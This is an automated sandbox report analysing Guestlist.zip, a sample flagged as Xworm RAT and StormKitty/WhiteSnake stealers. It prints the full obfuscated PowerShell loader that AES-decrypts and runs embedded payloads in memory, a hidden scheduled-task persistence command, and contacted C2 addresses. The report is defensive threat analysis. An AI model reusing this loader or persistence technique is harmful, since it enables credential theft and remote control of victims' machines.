Malware Analysis Report

2024-09-23 03:18

Sample ID 240703-yr1essxcnd
Target Guestlist.zip
SHA256 09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8
Tags xworm execution rat trojan gurcu stormkitty xenarmor collection password recovery spyware stealer upx
Score 10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK Matrix
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8

Threat Level: Known bad

The file Guestlist.zip was found to be: Known bad.

Malicious Activity Summary

xworm execution rat trojan gurcu stormkitty xenarmor collection password recovery spyware stealer upx

StormKitty payload

Gurcu, WhiteSnake

Detect Xworm Payload

Xworm

XenArmor Suite

StormKitty

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads local data of messenger clients

Executes dropped EXE

Reads WinSCP keys stored on the system

Loads dropped DLL

Reads user/profile data of local email clients

Reads user/profile data of web browsers

UPX packed file

Checks computer location settings

Reads data files stored by FTP clients

ACProtect 1.3x - 1.4x DLL software

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported 2024-07-03 20:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-07-03 20:01
Reported 2024-07-03 20:04
Platform win7-20240508-en
Max time kernel 122s
Max time network 123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function 
$payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

memory/1316-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/1316-6-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1316-5-0x000000001B540000-0x000000001B822000-memory.dmp

memory/1316-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/1316-12-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2024-07-03 20:01
Reported 2024-07-03 20:04
Platform win10v2004-20240508-en
Max time kernel 137s
Max time network 146s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function 
$payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wild2')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | api.telegram.org | udp
US | 142.202.242.177:7000 | | tcp
US | 142.202.242.177:7000 | | tcp
US | 142.202.242.177:7000 | | tcp
US | 142.202.242.177:7000 | | tcp
US | 142.202.242.177:7000 | | tcp

Files

memory/4144-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

memory/4144-6-0x0000027205A80000-0x0000027205AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ynkswj.5wa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4144-11-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-12-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-13-0x000002721EDF0000-0x000002721EE34000-memory.dmp

memory/4144-14-0x000002721EEC0000-0x000002721EF36000-memory.dmp

memory/2400-24-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-25-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-26-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/2400-29-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/4144-30-0x0000027205AB0000-0x0000027205AB8000-memory.dmp

memory/4144-31-0x000002721E070000-0x000002721E080000-memory.dmp

memory/4144-34-0x000002721E080000-0x000002721E094000-memory.dmp

memory/4144-33-0x00007FFC5B9F0000-0x00007FFC5BAAE000-memory.dmp

memory/4144-32-0x00007FFC5CA70000-0x00007FFC5CC65000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 baebece6c25520221e68055be287f370
SHA1 a3e7232cd44a9c9980da327dcd5124a0889a5486
SHA256 4e97fe0cb5b7c529ae80d3678e9f31fc25c09f0b450f9231d8a472be0d35de07
SHA512 fb57454e55b0a17254f898f52e5106fd82bcf2046c310ed207fa9f2d44526f66ad49335c105947a21c57681f4365707c63809a566f60bad47f745891cb7e9c5d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d662ecae338ca923a784422a86e9925
SHA1 ccdbbd6f3a1801b13f503d92f5d48fe5041ab495
SHA256 af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e
SHA512 5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

memory/4144-58-0x000002721F2A0000-0x000002721F2B6000-memory.dmp

memory/4144-60-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

memory/4144-61-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted 2024-07-03 20:01
Reported 2024-07-03 20:04
Platform win7-20240508-en
Max time kernel 122s
Max time network 123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function 
$payload3_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\dropped.bat

MD5 e770f53921bca6b9d02faf3e70059249
SHA1 fb04530ec135f2a34afd3bdf0c205193418812b6
SHA256 be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1
SHA512 f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86

memory/2468-6-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/2468-7-0x000000001B480000-0x000000001B762000-memory.dmp

memory/2468-8-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2468-9-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted 2024-07-03 20:01
Reported 2024-07-03 20:04
Platform win10v2004-20240611-en
Max time kernel 136s
Max time network 145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Gurcu, WhiteSnake

stealer gurcu

StormKitty

stealer stormkitty

StormKitty payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

XenArmor Suite

recovery password xenarmor

Xworm

trojan rat xworm

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

ACProtect 1.3x - 1.4x DLL software

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4612 set thread context of 1188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A
